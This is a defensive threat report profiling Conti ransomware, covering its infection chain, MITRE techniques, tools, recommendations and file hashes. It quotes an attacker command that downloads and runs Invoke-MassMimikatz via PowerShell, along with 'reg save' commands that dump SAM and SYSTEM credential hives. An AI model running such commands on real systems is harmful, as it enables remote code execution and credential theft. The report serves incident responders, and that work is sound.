Ransomware Spotlight: Conti




Conti

By Trend Micro Research

Assumed to be the successor of the Ryuk ransomware, Conti is currently one of the most notorious active ransomware families used in high-profile attacks. Know all about this ransomware family and protect your company against this threat.

ansomware Spotlight: Conti Infographic View infographic of "Ransomware Spotlight: Conti"

What do you need to know about Conti ransomware to help secure your organization?

Assumed to be the successor of the Ryuk ransomware, Conti is currently one of the most notorious active ransomware families, and is used as a ransomware-as-a-service (RaaS) in high-profile attacks such as those launched against healthcare institutions in Ireland and New Zealand.

Conti operators also leverage double extortion techniques, and have resorted to not just publishing stolen data, but also selling access to victim organizations that refused to pay the ransom.

Armed with other stealthy techniques such as BazarLoader and other tricks up its sleeves, the Conti ransomware family has the tenth-most attack attempts detected in the first half of the year, as reported in the Trend Micro 2021 Midyear Cybersecurity Report.

This article details the Conti ransomware to help incident responders and security teams spot attacks easier.


Top affected industries and counties

Conti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to November 12, 2021. The Netherlands and Taiwan ranked second and third respectively.

Figure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure

The retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications. Healthcare, which Conti operators targeted in high-profile attacks this year, is sixth on the list.

Figure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure

Infection chain and techniques

Figure 3. Conti infection chain


Initial Access

  • Conti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google Drive link that downloads the malware.
  • Alternatively, the ransomware can arrive via exploiting the the FortiGate firewall vulnerabilities CVE-2018-13379 and CVE-2018-13374. After successfully exploiting the application, the ransomware deploys Cobalt Strike to gain a foothold on the system.
  • Conti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities.

Discovery

  • For initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators information about where they are in the system, and what rights and permissions they have.
  • Since the operators employ double extortion tactics, they actively look for files to exfiltrate in the discovery stage. The threat actors use tools such as ShareFinder to identify the shares needed for exfiltration and ransomware deployment.

Privilege Escalation

  • Although the group mostly relies on finding the domain admin credentials to gain full access to the domain, they may also use a couple of exploits like Zerologon (CVE-2020-1472) and PrintNightmare (CVE-2021-1675), to elevate their privilege and further strengthen their foothold in the network.

Credential Access

  • The attackers dump cached credentials on systems to allow them to move laterally or elevate their privilege. They use tools such as ProcDump to dump system process/es (usually lssas.exe) and use it in combination with Mimikatz to dump credentials.
  • In other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems.
    • Mimikatz (mass-mimikatz, from Empire)
      C:\WINDOWS\SYSTEM32\WBEM\WMIC.exe /node:localhost process call create powershell /c IEX (NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose > c:/programdata/2.txt
  • Alternatively, they may also use the kerberoasting module of the PowerShell empire or use tools like Rubeus.
  • The attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass or use the comsvcs DLL file’s MiniDump function.
  • They also gain access to the credentials by taking them out of password stores.
    • One of the ways to do this is through “reg save” commands.
      - reg save HKLM\SAM C:\programdata\SamBkup.hiv
      - reg save HKLM\SYSTEM C:\programdata\FileName.hiv
    • They can also use tools such as Get-GPPPassword to get plain text passwords stored in the group policy preference
  • They can also gain credentials from browsers and cloud applications using tools such as SharpChrome and SeatBelt.
  • After gaining enough credentials, they use SMBAutoBrute to automate the task of bruteforcing the passwords and see what password works.
  • After gaining information on the domain accounts, the attackers then dump the domain controller credentials using Ntdsutil.
  • Alternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish this.

Lateral Movement

  • The attackers can also use batch files to disable security tools. These files are executed through scheduled tasks.
  • The groups are also known to use third-party tools such as Atera and AnyDesk to control remote systems.
  • The operators are also known to use EternalBlue to move laterally in the network of systems that are vulnerable to this exploit.
  • They also use PSExec to remotely execute scripts and the ransomware itself.

Defense Evasion

  • Just before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of its tools in the domain. These tools include scripts to terminate existing security software.
  • The operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this.

Execution

  • Ties to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to Cobalt Strike, which eventually leads to the ransomware itself.
  • Once the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on remote systems.
  • Alternatively, to execute the ransomware the operators can use files such as the DontSleep.exe process, which calls the task manager where the file can be executed.

Exfiltration

  • The attackers perform data exfiltration on the system with the use of the Rclone tool, which is an open-source tool used for syncing files to a specified cloud storage, such as Mega cloud storage.
  • The group can also use WinSCP to exfiltrate data.

Impact

  • After exfiltration and distribution of the ransomware to the targeted endpoints, the files are now encrypted using ChaCha20 with RSA4096 to protect the ChaCha key and nonce.
  • The ransomware also inhibits system recovery by deleting shadow copies using WMI.

MITRE tactics and techniques

Initial AccessExecutionPersistencePrivilege EscalationCredential AccessLateral MovementDefense EvasionCommand and ControlExfiltrationImpact

T1566 - Phishing
Arrives via phishing emails with BazarLoader

T1190 - Exploit public-facing application
Arrives via firewall exploits (CVE-2018-13379 and CVE-2018-13374)

T1106 - Execution through API
Uses native API to execute commands such as deleting shadow copies

T1059.003 - Command and scripting interpreter: Windows command shell
Uses batch files to distribute and execute ransomware

T1047 - Windows Management Instrumentation
Uses WMI to execute batch files and delete shadow copies

T1204 - User execution
User execution is needed to carry out the payload from the spear phishing link

T1053.005 - Scheduled task/job: scheduled task
Uses scheduled tasks as a means of execution for the ransomware

T1053.005 - Scheduled task/job: Scheduled task
Uses scheduled tasks as a means of execution for the ransomware

T1078.002 - Valid accounts: domain accounts
Uses domain administrator accounts to escalate privilege in the system

T1083 - File and directory discovery
Searches for specific files and directory related to its encryption

T1018 - Remote system discovery
Enumerates ARP entries to enable distribution to remote systems

T1057 - Process discovery
Discovers certain processes for process termination

T1016 - System network configuration discovery
Enumerates ARP entries to enable distribution to remote systems

T1069.002 - Permission groups discovery: domain groups
Searches for group information for privilege escalation

T1082 - System information discovery
Logs system information for information on the system

T1033 - System owner/user discovery
Performs user discovery for privilege escalation

T1012 - Query registry
Queries certain registry for stored passwords

T1063 - Security software discovery
Discovers security software for reconnaissance and termination


T1003 - OS credential dumping
Dumps LSASS memory to be used for retrieving password hashes

T1555 - Credentials from password stores
Extracts passwords from credential stores using tools such as SharpChrome, Seatbelt, and net-GPPPassword

T1552 - Unsecured credentials
Retrieves credentials using Mimikatz 

T1570 - Lateral tool transfer
Uses BITSAdmin to transfer tools across the network

T1021.002 - Remote services: SMB/Windows admin shares
Cobalt Strike uses admin shares to distribute itself to remote systems

T1562.001 - Impair defenses: disable or modify tools
Terminates certain security related software

T1140 - Deobfuscate/Decode files or information
Ransomware is obfuscated to make detection more difficult

T1055 - Process injection
Uses process injection to make detection more difficult

T1071 - Application Layer Protocol
Uses http to communicate to its C&C server

T1219 - Remote access software
Uses RMM software such as AnyDesk and Atera

T1567.002 - Exfiltration over web service: exfiltration to cloud storage
Syncs files to a specified cloud storage, such as Mega cloud storage.

T1486 - Data encrypted for impact
Uses ChaCha20 and RSA4096 to encrypt the files and key

T1489 - Service stop
Uses tools such as PC Hunter and GMER to terminate certain security-related services

T1490 - Inhibit system recovery
Uses WMIC to delete shadow copies

Summary of malware, tools, and exploits used

Security teams can watch out for the presence of the following malware tools, and exploits that are typically used in Conti attacks:

Initial EntryExecutionDiscoveryPrivilege EscalationCredential AccessLateral MovementDefense EvasionExfiltrationCommand and Control
  • Phishing emails
  • Firewall exploits (CVE-2018-13379 and CVE-2018-13374)
  • BazarLoader/
    BazarBackdoor
  • Cobalt Strike
  • DontSleep
  • Adfind
  • Net
  • NetScan
  • Nltest
  • ShareFinder
  • SharpView
  • PowerUpSQL
  • Whoami
  • EternalBlue (Ms17_010)
  • Mimikatz
  • PowerUpSQL
  • PrintNightmare (CVE-2021-1675)
  • RouterScan
  • Zerologon (CVE-2020-1472)
  • EComsvcs.dll
  • Mimikatz
  • Net-GPPPassword
  • Ntdsutil
  • PowerShell Empire: Kerberoast
  • ProcDump
  • RouterScan
  • Rubeus
  • SharpChrome
  • SMB AutoBrute
  • Task Manager
  • Vssadmin
  • AnyDesk
  • Atera
  • BITSAdmin
  • Cobalt Strike
  • EternalBlue
  • Mimikatz
  • PsExec
  • AV Uninstall
  • Cobeacon
  • GMER
  • Gpedit
  • PCHunter
  • PowerTool
  • KillAV
  • Rclone
  • WinSCP
  • Anydesk
  • Atera
  • Cobalt Strike
  • GOST (GO Simple Tunnel)
  • NGROK

Recommendations

To help defend systems against similar threats, organizations can establish security frameworks, which can allocate resources systematically for establishing a solid defense against ransomware.

Here are some best practices that can be included in these frameworks:



Audit and inventory

  • Take an inventory of assets and data
  • Identify authorized and unauthorized devices and software
  • Make an audit of event and incident logs

Configure and monitor

  • Manage hardware and software configurations
  • Grant admin privileges and access only when necessary to an employee’s role
  • Monitor network ports, protocols, and services
  • Activate security configurations on network infrastructure devices such as firewalls and routers
  • Establish a software allow list that only executes legitimate applications

Patch and update

  • Conduct regular vulnerability assessments
  • Perform patching or virtual patching for operating systems and applications
  • Update software and applications to their latest versions

Protect and recover

  • Implement data protection, backup, and recovery measures
  • Enable multifactor authentication

Secure and defend

  • Employ sandbox analysis for blocking malicious emails
  • Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network
  • Detect early signs of an attack such as the presence of suspicious tools in the system
  • Use advanced detection technologies such as those powered by AI and machine learning

Train and test

  • Regularly train and assess employees on security skills
  • Do red-team exercises and penetration tests

A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.

  • Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
  • Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning. 
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.
  • Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

Indicators of Compromise

Actual indicators might vary per attack.

Malware or toolSHA 256
AdFindb1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
BazarLoader243408d1fa0c8a7a778d8bb224532c649409d0db76fc0ca2be385d193da22b1e
9df20496f03f1e916dbaecbe7e99db411cd8044c13572d691febf13c22b7c572
f9507a76801d5b1b83704a5019cdc312de18b004f16c5547b91b7dba086b2e29
Cobalt Strike0d6a10df6eeb1dbb88b4d625873ed13daa367e165374a72daa16170af3ee31a0
234e4df3d9304136224f2a6c37cb6b5f6d8336c4e105afce857832015e97f27a
Conti0fd062f86151b9d49d65b8f12c52737600bff8bb3462aba7bf23d820bf4d5518
844cc2551f8bbfd505800bd3d135d93064600a55c45894f89f80b81fea3b0fa1
931e35c0d941d79c9ee11b9e1f114a3917fb520b8a9e920ba7c3c858edd1ae43
d21c71a090cd6759efc1f258b4d087e82c281ce65a9d76f20a24857901e694fc
d598d3ba492f156725ab5c69aaf882240b7d14ad136ec3a11ca8aed10bde2d05
eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe
PC Hunter55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c
2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32
Rclone9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8b
RouterScan18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311
HIDE

Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.

Veröffentlicht in Ransomware Spotlight, Ransomware